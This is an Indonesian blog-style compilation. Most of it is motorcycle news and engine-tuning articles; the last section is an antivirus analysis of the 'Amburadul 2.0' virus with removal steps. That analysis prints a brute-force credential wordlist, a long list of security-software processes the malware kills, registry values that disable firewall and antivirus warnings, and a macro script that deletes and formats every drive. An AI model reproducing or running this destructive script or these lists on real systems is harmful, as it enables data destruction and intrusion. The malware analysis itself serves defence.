Yamaha YZF-R15 2011 Mini R6

NEW DELHI (DP) — Kabar kehadiran sportbike Yamaha YZF-R15 2011 semakin santer, meskipun pihak pabrikan belum memberi konfirmasi kepastian waktunya.
Banyak pihak menengarai, R15 versi facelift ini tidak lama lagi akan diperkenalkan di India, isunya sekitar Maret 2011. Pasalnya kompetisi sepeda motor sportbike di negeri Hindustan semakin ramai dengan kepastian akan hadirnya Honda CBR 250R 2011 pada April 2011.

Tampilan baru R15 lebih berotot dan agresif layaknya sepeda motor supersport Yamaha YZF-R6. Jika dilihat desainnya menyiratkan mini R6.

Wajah depannya terlihat impresif dengan fairing bersirip seperti terlihat di R6.  Sedangkan bagian buritan terlihat futuristik dengan lampu model LED. Aura agresifnya semakin kental dengan blok mesin berkelir hitam dan velg alloy model double 5-spoke.

Dapur pacunya belum ada keterangan resmi dari Yamaha, namun kabarnya akan memiliki kapasitas 150 cc dengan tenaga tembus 20 hp. [dp/Wyu]

© 2011, Majalah Otomotif Online by. Dapurpacu.com. All rights reserved.

Upgrade Mio Budget Rp 1,2 Juta, Tenaga Naik 3,432 DK Cuy!

Jakarta- Berencana upgrade performa Yamaha Mio kesayangan makin responsif dan tambah kenceng? Tak ada salahnya meniru hasil racikan tunggangan milik Ricky, warga Bintaro, Jaksel ini. Pasalnya harganya terjangkau, serta pengerjaannya cepat serta enggak perlu rawat inap di bengkel.

“Harga paketannya cukup bersahabat; Rp 1,2 juta dan pengerjaannya hanya sehari. Setelah dites pakai mesin dyno, power-nya nambah 3,432 dk. Pokoknya dijamin puas deh,” ujar pembesut Mio Sporty lansiran 2009 ini.

Wow.. mantap Gan! Pasti ubahannya banyak? “Cuma pasang blok mesin baru plus piston set diameter 58, 5 mm (150 cc) dan aplikasi knalpot freeflow SKR. Part pendukung lainnya; spuyer X-treme 15/115, roller X-treme 11 gr, cop busi Power, busi Autolite 4194 dan paking blok (gbr.1),” sahut Muh. Suryadi, kepala mekanik Ultraspeed Racing (UR).
 
Selain aplikasi peranti di atas, dalam satu paket, pria akrab disapa Choky ini juga melakukan atur ulang squish head (gbr.2). Tujuannya tak lain agar diameter permukaan head sesuai sama diameter piston yang tambah besar. 

“Ujungnya piston tidak bakal nabrak permukaan bibir head. Squish-nya saya desain jadi 9° saja,” aku pria yang ngepos di Jl. H. Mencong No.42, Ciledug, Tangerang.

Enggak ketinggalan, porting polish lubang intake dan exhaust pada head mesin (gbr.3) juga dilakukan Choky. “Tujuannya agar peredaran BBM yang masuk ke ruang bakar maupun peredaran gas buang lebih optimal. Pemapasannya tidak banyak, sekitar 1 mm saja kok,” akunya.

Nah setelah tunggangan digarap sehari serta dilakukan penyesuaian dan setting sana-sini, besutan dites mesin dyno dynamometer DYNAmite milik UR (gbr.4). Sebelum di-upgrade/bore-up, kondisi masih standar, diperoleh power puncak 6,758 dk/8.600 rpm dan torsinya 6,044 Nm/.933 rpm.

Lalu setelah di-upgrade tercatat power maksimalnya 10,19 dk/7.719 rpm dan torsi 10,67 Nm/6.619 rpm. Ini menunjukkan ada kenaikan power sebesar 3,432 dk sedangkan torsinya bertambah 4,626 Nm.

Masih penasaran? Keterangan lebih komplet bisa sambangi UR langsung. Namun untuk pertimbangan harga maupun hasil garapan, sebelumnya bisa cari referensi ke bengkel lain terlebih dulu. (motorplus.otomotifnet.com)

Hasil Dyno
	Standar	Upgrade	Kenaikan
Power	6,758 dk/8.600 rpm	10,19 dk/7.719 rpm	3,432 dk
Torsi	6,044 Nm/.933 rpm	10,67 Nm/6.619 rpm	4,626 Nm
Ultraspeed Racing : 021-93858080/021-7313886

Tes Sepang MotoGP 2011: Honda Lebih Cepat dari Yamaha

SEPANG (DP) — Jika di paruh pertama Casey Stoner membukukan waktu 2’01.284, maka di paruh berikutnya lebih cepat lagi.

Stoner, pebalap Repsol Honda, menjadi pebalap tercepat dengan waktu 2’00.98 di sirkuit Sepang, hari ini (22/2). Di tempat kedua, rekan setimnya, Dani Pedrosa, yang lebih lambat  0.373 detik dari pebalap Australia tersebut.

Di tempat ketiga dan keempat diisi dua pebalap yang menggukan Yamaha. Juara MotoGP 2010, Jorge Lorenzo, mengalami perbaikan karena menjadi pebalap tercepat ketiga (+0.481). Lorenzo menggeser Andrea Dovizioso, yang hanya sanggup menjadi pebalap tercepat kelima dengan waktu 2’01.747.

Pebalap tercepat keempat diduduki Colin Edwards dari Monster Yamaha Tech 3. Pebalap berkebangsaan Amerika Serikat ini merekam waktu 2’1.654. Valentino Rossi (Ducati) justru melorot dari posisi kelima menjadi kesembilan dengan catatan waktu 2’1.999.

Sedangkan Marco Simoncelli, pebalap Carlo Honda Gresini, menjadi pebalap dengan fastest lap 2’0.757. [dp/Ind]

© 2011, Majalah Otomotif Online by. Dapurpacu.com. All rights reserved.

Modifikasi Liaran Suzuki Satria F-150, Turun Spek Demi Lawan

Aslinya Suzuki Satria F-150 punya Abdul Hamid Manan dari Pulogebang, Jakarta Timur ini, untuk turun di trek 800 meter. Cuma karena enggak ada lawan, Hari Novrian sang mekanik Hari Motor pun terpaksa turun spek.

“Kebetulan ada lawan yang spek-nya di bawah 800 meter. Hasil negosiasi sepakat jadi 600 meter. Pertama memang kalah karena bocor komporesi di head. Ke-2 malah bisa ninggal jauh motor lawan,” bangga mekanik di Jl. H. Naman, Blok R6, Pondok Kelapa, Jaktim.

Diakui Hari, motor tunggangan Dani Tilil ini tak banyak diubah untuk turun spek. Hanya agar mantap akselarasi tanpa mengurangi performa di top-speed. Seperti kompresi, awalnya 12,5:1 buat trek 600 meter naik jadi 13,5:1. Atu bisa dibilang naik satu poin agar putaran mesin bawah jadi lebih responsif.

"Maklum, trek lebih pendek kudu manjakan akselarasi. Apalagi rasio gigi 1 sampai 6 yang digarap koh Nanang Gunawan dari MCC untuk trek 800 meter masih dipakai. Paling gir ganti dari 16/34 jadi 15/35,” ujar mekanik disapa Uda ini.

Untuk bisa ninggalin rival, motor 250 cc setelah bore up juga naik stroke. Pakai piston Scorpio 70 mm dan stroke 66 mm setelah ganti stang piston RX-Z. Cuma harus geser pen kruk-as 9 mm dengan cara pen kruk-as asli diameter 28 mm diganti jadi 22 mm punya RX-Z. Lalu bekas lubang ditambal daging sambil dibuatkan lubang pen baru.

“Paking atas pakai standar 1 lembar. Paking bawah selain diganjal pelat aluminum 2 cm juga ditambah paking standar 1,5 mm,” ulas bapak dua anak ini.

Gabungan bensol biru, Pertamax dan udara dari karbu NSR SP reamer jadi 32 mm dengan spuyer 135/50. Buka-tutup diatur klep Thunder 125 yang punya ukuran 26 mm (in) dan 23 mm (ex).Diimbangi durasi kem 260 derajat baik untuk klep in maupun out.

Ayo siapa berani?. (www.motorplus-online.com)

Kampas Kopling Suzuki RGR

Komponen vital penentu kemenangan motor garapan Hari Novrian adalah kampas kopling. Tanpa didukung peranti mumpuni ini, tenaga motor hasil pembakaran akan percuma. Lantaran tenaga yang ditransfer tidak sepenuhnya dapat memutar roda belakang.

“Khusus untuk Satria F-150 ini, dipercayakan pada kampas kopling punya Suzuki RGR150. Selain memiliki material lebih kuat, penampang permukaan kampas juga lebih lebar. Risiko kampas selip jauh dari bayangan,” ujar Hari yang mempercayakan knalpot custom Joko Exhaust untuk pipa gas buang.

Dibanding aslinya, jika dipakai untuk balap biasanya tapak kampas gampang lepas. Selain itu umur pakai juga enggak bisa dipakai lebih dari 2 kali turun.

Wah, boros, dong?

Modifikasi Liaran Nouvo-Z Naik Stroke Tanpa Paking

Ciri-ciri mesin sudah korek habis, gampang terbaca lewat penambahan paking almu tebal di bawah silinder. Namun untuk main kelas standaran balap lurus malam hari, haram menggunakan paking tebal. Kudu menampakkan standar.

Seperti yang diterapkan Yamaha Nouvo Z 2005 milik Vincent Wijaya dari Jl. Taman Sari VIII, Jakarta Barat. Mesin terlihat seperti standar, namun akselarasi melesat. Wus...wus...wus...

Cara yang sudah lazim banyak dipakai mekanik lain juga diikuti oleh Otoy yang mengorek Nouvo ini. Yaitu menggunakan piston Honda CBR yang lebih pendek. Sehingga stroke bisa naik 3 mm dan turun 3 mm. Totalnya jadi 6 mm.

Untuk itu cukup menggunakan pen stroke 3 mm. Agar tidak merusak kruk as dan mudah dikerjakan. Total kenaikan stroke 6 mm ditambah langkah piston standar 57,9 mm. Jadinya 63,9 mm.

Namun agar tidak mudah jebol, kepala piston bagian samping harus dibuat mendem. Atau lebih rendah 0,3 mm dari permukaan atas blok.

Seher CBR150 yang dipakai buatan Hi Speed. Punya diameter 66 mm. “Kapasitas silinder yang dihasilkan jadi 218,5 cc,” jelas Otoy yang buka bengkel B-Nana Racing di Jl. Pademangan 2, No. 131, Jakarta Utara.

Namun ada yang aneh. Kelas standaran biasanya dibolehkan menggunakan part luar serba standar. Seperti karburator juga harus menggunakan standar Nouvo yang masih vakum.

Tapi, di Nouvo ini malah menggunakan karburator PE. Ukurannya yang gede pula, yaitu 32 mm. Turun di kelas standar pasti lawan tidak akan mau.

Ada-ada saja.

Dominasi Part Thailand

Tidak disangka kalau jeroan mesin Nouvo-Z milik Vincent ini banyak pakai part dari Thai alias Thailand. Di antaranya satu set head beserta isinya, kem aftermarket yang punya lift tinggi. Serta satu gelondong kruk-as buat Nouvo-Z yang diboyong langsung dari negeri Gajah Putih.

“Bahkan komponen di dalam CVT seperti belt, roller, puli, kopling sentrifugal juga dibawa langsung dari sana. Tidaak ketinggalan knalpot racing model terbaru untuk motor ini, juga beli langsung di sana. Pokoknya modelnya beda,” ujar Vincent yang rencananyajuga mau buka toko variasi bernama Vincent’s Racing Galerry dalam waktu dekat ini.

Cuma saat ditanya pakai merek apa yang akan dipakai nantinya? Vincent tidak mau kasih tahu. Katanya sih, lihat saja nanti setelah tokonya berdiri. (www.motorplus-online.com)

Safety Riding Lady Biker Berjilbab, Pilih Katun dan Simpel

Jakarta - Perempuan berjilbab dan berkendara tetap harus nyaman saat pakai helm. Jilbab bukan halangan untuk tetap menjaga keamanan kepala saat berkendara. Dan yang perlu diingat, jilbab beda dengan helm. Pakai jilbab bukan halangan untuk tetap safety.

Namun pemilihan jilbab buat lady biker tetap perlu diperhatikan. Beberapa trik agar tetap nyaman saat berkendara harian. Nurmaha Dewi, Senior Manager Butik Griya Kecantikan Dewi di Jl. Galaxi Raya, Blok A. No. 54, Bekasi, Jawa Barat, sedikit memberikan tips buat pengendara cewek berjilbab.

Wanita berjilbab ini menyarankan agar memilih yang simpel. Baik soal bentuk, warna, bahan serta ornamen yang menyertainya.

"Sebaiknya  pilih bahan yang tidak licin. Seperti katun. Hindari sifon. Sebab sifon bahannya licin. Jika dipakai dengan helm, bikin helm mudah bergerak. Akibatnya, berkendara jadi tidak nyaman. Bahkan bisa merusak konsentrasi berkendara," anjurnya.

Dari sisi bentuk, silakan bikin simpel. Tanpa banyak tambahan aksen. Pemakaian helm yang benar harus ngeplak dengan kepala atau tidak ada rongga.

Kalau memakai ciput atau pelapis kerudung bagian dalam, pilih juga ciput yang tidak terlalu mancung. Efek mancung malah bikin ciput rusak karena kena tekukan helm.

Jika suka variasi jilbab seperti bandana luar dengan aneka kembang atau bros ronce panjang untuk bagian belakang, "Sebaiknya dipakai jika sudah sampai di tempat tujuan atau pilih variasi kecil yang tidak mengganjal di helm," tambah wanita selalu tampil rapi ini.

Seperti dilakukan Vera Maulana. Lady biker Harley-Davidson ini lebih suka dengan  memakai bandana di bagian dalam, lalu ditutup dengan syal di bagian luar. "Simpel nggak mengganggu saat berkendara," terangnya.

Kalau terbiasa dengan konde di atas, untuk pakai helm akan mengganjal. "Kadang malah bikin sakit di kepala," ujar Dewi, panggilan karib Nurmaha Dewi.

Sebaiknya posisikan konde agak ke bawah, sehingga tidak masuk ke dalam helm. Atau cukup dikuncir.

Lady biker yang suka tampil simpel bisa juga hanya memakai ciput. Ini bisa menyiasati menutup bagian leher dengan memakai baju dengan kerah berdiri hingga menutupi leher.

Pemilihan warna juga penting. Pilih warna yang yang soft seperti warna pastel. Hindari warna terang. "Warna-warna soft lebih sedikit menyerap sinar matahari, sedangkan warna terang akan lebih banyak menyerap sinar matahari. Akibatnya warna terang lebih mudah bikin kepala panas.

Paling tidak warna akan sedikit mengurangi rasa panas. Dan warna soft juga tidak mudah membuat jilbab terlihat kotor," tutupnya ramah. (motorplus.otomotifnet.com)

P3K untuk VIRUS AMBURADUL versi 2.0 : Virus dengan Teknologi Hacking beragam Metode Modern

Amburadul.. begitulah kata yang terucap ketika seseorang terinfeksi virus yang berakibat fatal sampai user tak bisa makan, minum mapun tidur, gara2 semua data amburadul alias hilang entah bagaimana ceritanya, tiba-tiba "ntldr missing" ketika di PC dinyalakan. Virus ini tergolong virus akhir tahun yang berakibat fatal, yang sebelumnya versi 1.0 dari virus ini cukup menghebohkan dengan kritik 'bahasa inggris si pembuat virus ancur lebur', dalam versi 2.0 ini si pembuat mengunakan bahasa indonesia, mungkin belum sempat untuk kursus inggris. 

Virus masih dalam keluarga VB & Delphi yang di pack mengunakan UPX / PE Lite dengan mengadopsi file .pif/.cmd/.bat sebagai tringger route dengan mengunakan MacroX dan mengunakan celah keamanan VNC (remote control) port 590X. Virus lokal amburadul mengunakan celah keamanan dari share folder dan network device dengan mengunakan metode ipc$, admin$, serta brute force untuk menjalankan aksinya, tiba-tiba data/settingan kembali ke semula (default), demikian file/folder yang tersharing, lenyap berserta dengan file2nya, sekaligus box linuxpun ikut dikerjai dengan beberapa exploit yang ada didalam tubuh virus. 

Sampai akhir desember 2010 ini, Vaksincom mendapakan laporan lebih dari 210 pelapor dalam 1 bulan terakhir ketika virus diperkirakan menyebar lewat YM, E-mail serta situs2 jejaring social seperti facebook, twiiter dan linkedin, yang menutup tahun 2010 dengan "Virus of The Year". Diperkirakan pembuat berasal dari Semarang, Indonesia seorang mahasiswa yang juga tergabung dalam group hacker turki "iSKORPiTX" dengan nick "The Conflickzer", diketahui dari file trojan/backdoor dari badan file yang merupakan file pendukung untuk hacking dan beberapa exploit untuk mengexploitasi sistim operasi khususnya bagi penguna Linux. 

Selain itu virus memiliki teknologi Multipolymorhpic yang merupakan file induk berupa karakter teracak dengan badan virus yang teracak juga, hal ini membuat sulit vendor antivirus untuk membuat antivirus yang tepat untuk virus ini. Selain itu virus mengunakan Macro Recording, dimana pada saat2 tertentu, mouse seakan2 berjalan sendiri dengan ketikan keyboard untuk menghapus seluruh file sistim/data pada komputer user. Ikuti perjalanan team Vaksincom membongkar virus Amburadul versi 2.0 ini. 

1. Nama Virus : W32.Amburadul-2 alias Ambrol-II/PoisonIvy/DeadLock/MatroX/Brontx.EQ/D.ALL

2. Asal Pembuat : Semarang - Indonesia

3. Dibuat dengan : Batch File adopt dari file .pif, .cmd, bat mengunakan MacroX & AutoIt dengan kompresi UPX / PE Lite dan Backdoor / Trojan dibuat mengunakan bahasa pemograman VB & Delphi.

4. Efek : Vaksincom mencatat ada 10 efek nyata yang dilakukan oleh Virus Amburadul sesuai dengan tringger routine virus, seperti :

• Menghapus seluruh file offline pada drive Z s/d C secara berurutan, dengan memberi label volume "AMBURADUL" mengunakan batchfile/macrox (port 5900/vnc)
• Mengformat data drive Z s/d C (kecuali sistim) dengan menganti label selain drive C dengan "AMBURADUL" dengan metode yang sama (no. 1).
• Injeksi ke Internet Explorer dengan menambahkan System Down – hacked by iSKORPiTX (hacker turki yang memiliki backdoor / trojan celah keamanan pada rpc-windows.
• Mematikan fungsi antivirus dengan cara melakukan uninstall dan mematikan proses penjagaan (guarding) antivirus/firewall.
• Mengirimkan informasi typing horse ke iskorpitx@yahoo.com danconflickzer@yahoo.com berupa update status virus dan info pc terinfeksi berupa key trapped.
• File induk terletak pada badan file sistim windows (svchost.exe, csrss.exe, alg.exe) yang digunakan oleh virus conficker dengan menyebabkan rpc hole berakibat jaringan down/looping.
• Mengunakan Macro Recording untuk menjalan aksi lewat remote VNC (port 5900), yang merupakan bug dari vnc versi 4 dengan membypass password default.
• Menginject jaringan dengan metode IPC$ pada bug sharing pada Windows dengan melakukan direktori network listing untuk menjalankan aksi menghapusan file/data.
• Mencoba untuk masuk ke sistim keamanan jaringan Windows / Linux dengan mencoba beberapa username dan password dengan metode bruteforcing. Dengan informasi user/password yang dicoba sbb :
  
  Username yang di gunakan :
  - admin
  - administrator
  - [namakomputer]
  - [namaworkgroup]
  - [namauser]
  - [namafilesharing]
  - [namadomain]
  - root
  - master
  - manager
  - system
  - sysadmin
  - sysop
  - SUPPORT_388945a0
  - ASPNET
  - HelpAssistant
  
  dengan password dala file wordlist :
  - admin
  - administrator
  - password
  - admin123
  - adm
  - 123456
  - 12345
  - 1234567
  - qwerty
  - root
  - [namakomputer]
  - [namaworkgroup]
  - [namauser]
  - [namafilesharing]
  - [namadomain]
  - *blank*
  - ..dll
  Dan mengunakan teknik Bruteforcing dengan mencoba karakter A-Z, a-z,
  0-9, !@#$%^&*()-{}\<> untuk menembus jaringan lokal mapun alat -
  alat device seperti print server, router, access point, fingerprint, pabx,
  wacom, cctv, dll.
  
• Membuat schduler pada Windows berupa tringger aktif dan Linux berupa crontab serta injeksi registry pada file.com, .exe, .pif, .lnk, .cmd, .txt, .jpg, dengan menambahkan explorer pada svchost.exe, userinit.exe dan winlogon.exe saat komputer di restart dan mematikan fungsi system restore dan windows/linux firewall.

5. Media Sebar : Flashdisk, e-mail (attachment/.lnk) dan Yahoo messenger.

6. Security Vuln : Merusak sistim kekebalan baik oleh Windows Firewall mapun aplikasi security seperti :

A2CMD, A2FREE A2GUARD A2SERVICE, ADVCHK, AGB, AHPROCMONSERVER, AIRDEFENSE, AKRNL, ALERTSVC, AMON, ANTIVIR APVXDWIN, ARMOR2NET, ASHAVAST, ASHDISP, ASHENHCD, ASHMAISV, ASHPOPWZ, ASHSERV, ASHSIMPL, ASHSKPCK, ASHWEBSV, ASWSCAN, ASWUPDSV, AVAST AVCENTER AVCIMAN, AVCONSOL, AVENGINE, AVESVC, AVEVAL, AVEVL32, AVGAM AVGCC, AVGCC32, AVGCHSVX, AVGCSRVX, AVGCTRL, AVGEMC, AVGFWSRV, AVGNSX, AVGNT, AVGNTMGR AVGSERV, AVGTRAY, AVGUARD, AVGUPSVC, AVGWDSVC, AVINITNT, AVIRA AVKSERV, AVKSERVICE, AVKWCTL, AVP, AVP32, AVPCC, AVPM, AVSCHED32, AVSERVER, AVSYNMGR, AVWUPD32, AVWUPSRV, AVXMONITOR AVXQUAR, AVZ, BDSWITCH, BITDEFENDER, BLACKD, BLACKICE, CAFIX, CCEVTMGR, CCSETMGR, CFIAUDIT, CFP, CFPCONFIG, CLAMTRAY, CLAMWIN, CUREIT, DEFENDERDAEMON, DEFWATCH, DRVIRUS, DRWADINS, DRWEB, DWEBIO, DWEBLLIO, EKRN, ESCANH95, ESCANHNT, EWIDOCTRL, EZANTIVIRUSREGISTRATIONCHECK, F-AGNT95, F-SCHED, F-STOPW, FAMEH32, FILEMON, FIREWALL FORTICLIENT, FORTISCAN, FORTITRAY, FPAVSERVER, FPROTTRAY, FPWIN, FRESHCLAM, FSAV32, FSAVGUI, FSBWSYS, FSDFWD, FSGK32, FSGK32ST, FSGUIEXE, FSMA32, FSMB32, FSPEX, FSSM32, GCASDTSERV, GCASSERV, GIANTANTISPYWARE, GUARDGUI, GUARDNT, GUARDXKICKOFF, GUARDXSERVICE, HREGMON, HRRES, HSOCKPE, HUPDATE, IAMAPP, IAMSERV, ICLOAD95, ICLOADNT, ICMON, ICSSUPPNT, ICSUPP95, ICSUPPNT, INETUPD, INOCIT, INORPC, INORT, INOTASK, INOUPTNG, IOMON98, IPTRAY, ISAFE, ISATRAY, KAV, KAVMM, KAVPF, KAVPFW, KAVSTART, KAVSVC, KAVSVCUI, KMAILMON, MAMUTU, MCAGENT, MCMNHDLR, MCREGWIZ, MCUPDATE, MCVSSHLD, MINILOG, MYAGTSVC, MYAGTTRY, NAVAPSVC, NAVAPW32, NAVLU32, NAVW32, NEOWATCHLOG, NEOWATCHTRAY, NISSERV NISUM, NMAIN, NOD32 NORMIST, NOTSTART, NPAVTRAY, NPFMNTOR, NPFMSG, NPROTECT, NSCHED32, NSMDTR, NSSSERV, NSSTRAY, NTOS, NTRTSCAN, NTXCONFIG, NUPGRADE, NVCOD, NVCTE, NVCUT, NWSERVICE, OFCPFWSVC, ONLINENT, OP_MON, OPSSVC, OUTPOST PAVFIRES, PAVFNSVR, PAVKRE, PAVPROT, PAVPROXY, PAVPRSRV, PAVSRV51, PAVSS, PCCGUIDE, PCCIOMON, PCCNTMON, PCCPFW, PCCTLCOM, PCTAV, PERSFW, PERTSK, PERVAC, PESTPATROL PNMSRV, PREVSRV, PREVX PSIMSVC, QHONLINE, QHONSVC, QHSET, QHWSCSVC, QUHLPSVC, RFWMAIN, RTVSCAN, RTVSCN95, SALITY SAPISSVC, SAVADMINSERVICE, SAVMAIN, SAVPROGRESS, SAVSCAN, SCANNINGPROCESS, SCANWSCS, SDHELP, SDRA64, SHSTAT, SITECLI, SPBBCSVC, SPHINX, SPIDERCPL, SPIDERML, SPIDERNT, SPIDERUI, SPYBOTSD, SPYXX, SS3EDIT, STOPSIGNAV, SWAGENT, SWDOCTOR, SWNETSUP, SYMLCSVC, SYMPROXYSVC, SYMSPORT, SYMWSC, SYNMGR, TAUMON, TBMON, TMLISTEN, TMNTSRV, TMPROXY, TNBUTIL, TRJSCAN, TROJAN, VBA32ECM, VBA32IFS, VBA32LDR, VBA32PP3, VBSNTW, VCRMON, VPTRAY, VRFWSVC, VRMONNT, VRMONSVC, VRRW32, VSECOMR, VSHWIN32, VSMON, VSSERV, VSSTAT, WATCHDOG, WEBSCANX, WINSSNOTIFY, WRCTRL, XCOMMSVR, ZLCLIENT, ZONEALARM 

7. Modifikasi Reg : Selain menyembuyikan dari Task Manager / MsConfig, virus ini 
mematikan beberapa fungsi windows dari registry seperti :


AntiVirusDisableNotify = 1
AntiVirusOverride = 1
FirewallDisableNotify = 1
FirewallOverride = 1
UacDisableNotify = 1
UpdatesDisableNotify = 1 
Hidden = 2
EnableFirewall = 0

8. File Induk : Memiliki beberapa file induk :
- [fileacak].lnk // Shortcut untuk menjalankan Trojan / Backdoor
- [fileacak].pif // Trojan
- [fileacak].exe // Backdoor
- [fileacak].cmd // Script Otomatis Tringger Routine
- [fileacak].bat // Script Otomatis Tringger Routine

Terletak pada seluruh direktory file sharing maupun [drive]:\ [windir]\system32 

[fileacak] = angka dan huruf dengan beberapa case menyamar sebagai svchost.exe, ctfmon.exe, alg.exe, dan csrss.exe.

9. AutoScript : Memiliki beberapa script berbahaya dengan mengunakan MacroX dengan 
mengambungkan dengan port 5900 pada VNC server (bug vnc diissue dari
tahun 2003, dapat di lihat jelas pada :

http://www.realvnc.com/pipermail/vnc...ch/037830.html 
http://www.securityspace.com/smysecu....html?id=10758

dengan Script Macro yang dijalankan sesuai dengan tringger routine :

<//Script:RunFirst.macro//>
MousePos=45,755
MouseButton=1,1
Activate=Start Menu
Text={UP 3}{ENTER}
Activate=Run
Text=cmd{ENTER}
Activate=Program Manager
Activate=C:\[windir]\system32\cmd.exe
Repeat=26
Drive=Drive+Chr$([Count+1])
Text=[drive]<Shift>ü</Shift>{ENTER}cd\{ENTER}
Text=rd /S /Q .{ENTER}
Until=0
Activate=C:\[windir]\system32\cmd.exe
Text=c<Shift>ü</Shift>{ENTER}cd\{ENTER}
Text=rd /S /Q .{ENTER}
Activate=C:\WINXP\system32\cmd.exe
Text=format /C /Q [drive]:{ENTER}
Text=Label [drive] AMBURADUL
Wait=183
Text=LABEL AMBURADULt{ENTER}
Activate=Exit
Memiliki beberapa Script Macro dengan keyboard mapun mouse untuk menjalakan aksi dengan menyusup melalui celah vnc / port 5900/5901/2 

10. Solusi : Untuk mengatasi virus Amburadul versi 2.0 ini sebelumnya kami ingatkan 
agar backup data/files senantiasa dan pergunakan username/password yang 
tidak baku / standar, lakukan update antivirus secara berkala.

• Lakukan pemutusan terhadap jaringan/koneksi
• Disable [System Restore] selama proses pembersihan
• Matikan proses virus dengan mengunakan Process Explorer, cari beberapa file yang dicurigai seperti svchost.exe, ctfmon.exe, alg.exe dengan byte yang besar dan proses load processor yang tinggi serta beberapa file ext .tmp, .lnk, .sys, .drv dan file ext yang tidak standart.
• Agar tidak terinfeksi kembali lakukan pembatasan pada policy windows dengan cara :
  
  Caranya:
  -. Start -- Run ketik perintah SECPOL.MSC kemudian klik tombol [OK]
  -. Setelah muncul layar Local Security Settings, klik kanan pada menu Software Restriction Policies lalu klik Create New Policies
  -. Pada menu Software Restriction Policies, klik Additional Rules
  -. Klik kanan pada Additional Rules, kemudian pilih New Hash Rule, dan akan muncul layar New Hash Rule
  -. Pada kolom File hash klik tombol Browse, kemudian arahkan ke direktori [C:\Windows\system32\[fileacakvirus.exe] dan klik tombol [Open]
  -. Pada kolom Security level pilih [Disallowed]
  -. Pada kolom description boleh di isi atau dikosongkan saja
  -. Klik tombol [Apply] dan [Ok]
  
  Catatan: Jika komputer Anda tidak terinstall Windows XP Professional / 2003 Server 2000 Server / Vista / 2008 lewati langkah ini.
• Hapus string registry dengan mengunakan CureIt dan Repair dengan mengunakan TuneUp Utilities 2010
• Jika terinfeksi virus ini, user tidak dapat melakukan booting Windows dengan muncul pesan error NTLDR Is Missing, sebaiknya dilakukan Repiar atau Install ulang.
• Sementara untuk file yang telah di hapus, dapat direcovery mengunakan software Recovery seperti getDataBase / EasyRecovery / Recovery My Files dengan mengunakan type delete atau format recovery.
• Hapus seluruh file virus dengan mengunakan Kaspersky Virus Removal Tools 2010 yang dapat di download :
  http://support.kaspersky.com/viruses...ol2010?level=2
• Update patch security terbaru untuk celah port 5900, rpc, ipc$ melalui
  site microsoft : http://www.microsoft.com/downloads
• Backup Data Anda sekarang juga!!! dan update antivirus!!

Akhir kata penulis berpesan kepada seluruh pengunakan PC di Indonesia, agar membackup data senantiasa secara terperiodik, jangan hanya mengandalkan program security, firewall atau antivirus karena program tersebut selalu kalah selangkah oleh program2 penganggu seperti virus, backdoor, trojan, dll. Lakukan update patch khususnya operating sisitim Microsoft Family, juga Linux disarankan karena virus mulai beralih ke sistim keamanan Linux. Tak lupa Vaksincom mengucapkan Hari Natal 2010 dan Tahun Baru 2011, sampai bertemu pada artikel berikutnya dengan pembahasan yang lebih menarik. Adios Amigos.